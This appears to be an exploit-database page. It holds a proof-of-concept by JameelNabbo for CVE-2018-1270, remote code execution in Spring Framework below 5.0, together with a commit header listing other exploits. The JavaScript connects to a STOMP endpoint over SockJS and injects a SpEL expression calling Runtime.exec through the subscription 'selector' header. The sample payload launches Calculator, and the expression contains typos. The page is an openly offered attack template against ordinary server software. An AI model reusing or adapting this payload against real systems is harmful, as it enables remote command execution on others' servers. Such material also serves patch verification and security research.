96e4f1686b
9 changes to exploits/shellcodes GNU Barcode 0.99 - Buffer Overflow GNU Barcode 0.99 - Memory Leak IssueTrak 7.0 - SQL Injection Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection NUUO NVRmini2 / NVRsolo - Arbitrary File Upload MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting Pivotal Spring Java Framework < 5.0 - Remote Code Execution Facebook Clone Script 1.0.5 - 'search' SQL Injection Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
28 lines
No EOL
1.1 KiB
Text
28 lines
No EOL
1.1 KiB
Text
# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
|
|
# Date: 2018-05-28
|
|
# Exploit Author: JameelNabbo
|
|
# Website: jameelnabbo.com <http://jameelnabbo.com/>
|
|
# Vendor Homepage:
|
|
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
|
|
# CVE: CVE: CVE-2018-1270
|
|
# Version: <= 5.0.x
|
|
|
|
# Description: By connecting to spring STOMP, and putting the key for "selector"
|
|
# header, we can execute code on Spring.
|
|
|
|
# POC:
|
|
# Here' we are writting java commands to be executed within the selector header
|
|
# Connecting to a web socket using SockJS
|
|
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable
|
|
|
|
var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};
|
|
|
|
var socket = new SockJS('/gs-guide-websocket');
|
|
var stompClient = webstomp.over(socket);
|
|
stompClient.connect({}, function (frame){
|
|
setConnected(true);
|
|
console.log('Connected: ' + frame);
|
|
stompClient.subscribe('/topic/greetings', function(greeting){
|
|
showGreeting(JSON.parse(greeting.body).content);
|
|
},header);
|
|
}); |